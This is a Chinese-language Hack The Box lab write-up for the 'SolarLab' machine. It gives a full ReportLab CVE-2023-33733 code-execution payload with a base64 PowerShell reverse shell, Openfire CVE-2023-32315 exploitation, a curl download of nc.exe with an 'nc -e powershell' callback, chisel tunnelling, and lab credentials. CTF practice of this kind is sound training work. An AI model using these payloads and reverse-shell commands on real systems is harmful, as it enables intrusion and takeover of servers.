htb_solarlab

端口扫描

80,445

子域名扫描

木有

尝试使用smbclient连接445端口

Documents目录可查看

将Documents底下的文件下载到本地看看

xlsx文件里有一大串用户信息，包括username和password

先弄下来

不知道在哪登录，也没有子域名，于是返回进行全端口扫描

多了一个6791端口

扫描后发现子域名，添加入/etc/hosts后访问

可以尝试登录了

用刚刚得到的用户名密码字典进行爆破，居然没成功

没辙了，去找别人的提示看看

说是要把用户名和邮箱首位拼在一起，得到一个新用户名blakeb

尝试固定用户名再次爆破

成功

blakeb ThisCanB3typedeasily1@

登入ReportHub

用来转pdf的

搜索后找到一个比较新的漏洞

CVE-2023-33733

 <para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
</para>

将powershell反弹shell和payload拼在一起

 <para>
      <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA3ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
</para>

成功反弹

查看文件后发现一个user.db

直接type随便看看

大概是一个新建表的脚本，里面有几个username和password，等会有用再回来看

查看端口开放netstat -ano

眼熟的9090

上传chisel转发出来

./chisellinux server -p 6150 --reverse

./chiselw.exe client 10.10.14.87:6150 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

本地访问127.0.0.1:9090

版本4.7.4的openfire

记得openfire有cve

CVE-2023-32315

可以直接添加用户获取shell

o30fib pfnkxi

登入后台

按着提示一步步走

上传openfire-managerment-tool-plugin.jar

输入123登入

可以执行cmd命令了

上传nc.exe反弹shell

curl http://10.10.14.87:3333/nc.exe -o nc.exe

nc.exe 10.10.14.87 2222 -e powershell

成功

查看用户权限，没有有用的

查看目录

发现openfire.script文件

查看后发现有administrator的用户凭据

不知道怎么利用，又去看了看别人的

需要下载利用文件

添加链接描述

解密出密码

java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn

ThisPasswordShouldDo!@

上传RunasCs.exe

./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.87:6666

成功提权